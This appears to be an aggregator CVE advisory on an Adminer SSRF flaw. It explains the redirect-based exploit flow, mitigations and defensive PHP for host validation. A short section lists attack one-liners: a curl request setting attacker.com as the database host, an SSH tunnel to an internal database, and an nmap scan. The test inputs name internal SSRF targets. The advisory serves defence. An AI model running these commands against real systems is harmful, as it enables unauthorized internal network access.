How the mentioned CVE works:
The vulnerability exists in Adminer versions 4.0.0 to 4.7.8, specifically in the bundled `adminer.php` build that includes all database drivers. The flaw allows Server-Side Request Forgery (SSRF) through the database connection flow: an attacker supplies an external URL as the database host, and when Adminer connects to it, the server-side HTTP request follows redirections returned by that host. A redirect can therefore steer the server's own request to an arbitrary internal or external system, letting the attacker probe and interact with services on the server's network that are otherwise unreachable from outside, which can lead to information disclosure or further exploitation.
Platform: Adminer
Version: 4.0.0 – 4.7.8
Vulnerability: Server-Side Request Forgery
Severity: High
Date: 2021-03-02
Prediction: Patched in 4.7.9
What Undercode Says:
`curl -X POST http://target/adminer.php -d 'server=attacker.com&…'`
`ssh -L 5432:internal-db:5432 user@jumpserver`
`nmap -sV 192.168.1.1/24 --script http-auth-finder`
How the exploit works:
The attacker sets a malicious database host. The Adminer server sends an HTTP request to that host. The attacker's server responds with a redirect to an internal IP address. Adminer follows the redirect, and the resulting request probes the internal service on the attacker's behalf.
Protection from this CVE:
Upgrade to Adminer 4.7.9. Restrict outbound network policy for the Adminer host so it can reach only the intended database servers. Deploy the driver-specific Adminer build for the one database you use instead of the all-drivers `adminer.php`. Segment database networks so that a compromised web tier cannot reach internal services directly.
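The two application-level controls implied above, validating the user-supplied host before any HTTP-based driver connects to it and refusing to follow redirects on the server-side request, are shown below as an added example. This is illustrative PHP written for this page, not Adminer's own code or its 4.7.9 patch; the helper names `db_host_is_allowed` and `fetch_without_redirects` and the allowlist parameter are assumptions. The example goes slightly beyond the advisory text by also rejecting hosts that resolve to private or reserved address ranges, which blocks the redirect-to-internal-IP pattern even when the first hop looks harmless.

```php
<?php
// Added example, not Adminer's code: harden a user-controlled database host
// before a driver opens an HTTP connection to it, and fetch without
// following redirects so an attacker-controlled host cannot bounce the
// server's request to an internal address.

/**
 * Hypothetical helper. Returns true only when $host is a bare hostname or
 * IP literal, appears in $allowlist (if one is configured), and resolves
 * exclusively to public, routable addresses.
 */
function db_host_is_allowed(string $host, array $allowlist = []): bool
{
    // No scheme, path, port or userinfo: the value must not smuggle a URL.
    if (!preg_match('/^[A-Za-z0-9.\-]+$/', $host)) {
        return false;
    }
    if ($allowlist !== [] && !in_array(strtolower($host), $allowlist, true)) {
        return false;
    }
    // Resolve and check every address; a name may map to several.
    $ips = filter_var($host, FILTER_VALIDATE_IP) !== false
        ? [$host]
        : (gethostbynamel($host) ?: []);
    if ($ips === []) {
        return false;
    }
    foreach ($ips as $ip) {
        // Rejects loopback, RFC 1918, link-local (169.254/16) and other
        // reserved ranges; these are the usual SSRF redirect targets.
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return false;
        }
    }
    return true;
}

/**
 * Hypothetical helper. Performs the HTTP request an HTTP-based driver would
 * make, with redirect following disabled. Returns the response body, or
 * null when the host is rejected, the request fails, or the endpoint
 * answered with a 3xx redirect (treated as an error, never as a hop).
 */
function fetch_without_redirects(string $host, int $port, string $path, array $allowlist = []): ?string
{
    if (!db_host_is_allowed($host, $allowlist)) {
        return null;
    }
    $ctx = stream_context_create(['http' => [
        'method'          => 'GET',
        'follow_location' => 0,    // never follow Location headers
        'ignore_errors'   => true, // hand back the body on 3xx/4xx so we can inspect the status
        'timeout'         => 5,
    ]]);
    // $http_response_header is set in this scope by the http stream wrapper.
    $body = @file_get_contents("http://$host:$port$path", false, $ctx);
    $status = 0;
    if (isset($http_response_header[0])
        && preg_match('{^HTTP/\S+\s(\d{3})}', $http_response_header[0], $m)) {
        $status = (int) $m[1];
    }
    if ($body === false || ($status >= 300 && $status < 400)) {
        return null;
    }
    return $body;
}

// Constructed inputs for illustration: each of these should be rejected by
// the host check before any network traffic is sent.
foreach (['127.0.0.1', '10.0.0.5', '169.254.169.254', 'http://evil.example/'] as $candidate) {
    printf("%-24s allowed=%s\n", $candidate, db_host_is_allowed($candidate) ? 'yes' : 'no');
}
// With an allowlist, only the named database hosts pass, even if public.
var_dump(db_host_is_allowed('db.example.internal', ['db.example.internal']));
```

The design point is that the two checks are independent: the allowlist and address-range check stop the first request from leaving for an attacker-controlled host, and `follow_location => 0` means that even a host that was allowed but later compromised cannot turn the server into a redirect-driven proxy into the internal network.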
Impact:
Unauthorized internal network access. Sensitive service interaction. Potential data exposure.
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode

